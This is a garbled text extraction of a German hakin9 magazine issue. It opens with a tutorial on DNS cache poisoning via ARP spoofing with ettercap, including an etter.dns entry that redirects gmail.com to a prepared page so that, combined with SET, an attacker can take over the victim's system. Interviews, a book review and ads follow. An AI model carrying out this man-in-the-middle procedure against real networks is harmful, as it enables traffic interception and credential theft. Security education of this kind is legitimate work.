wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
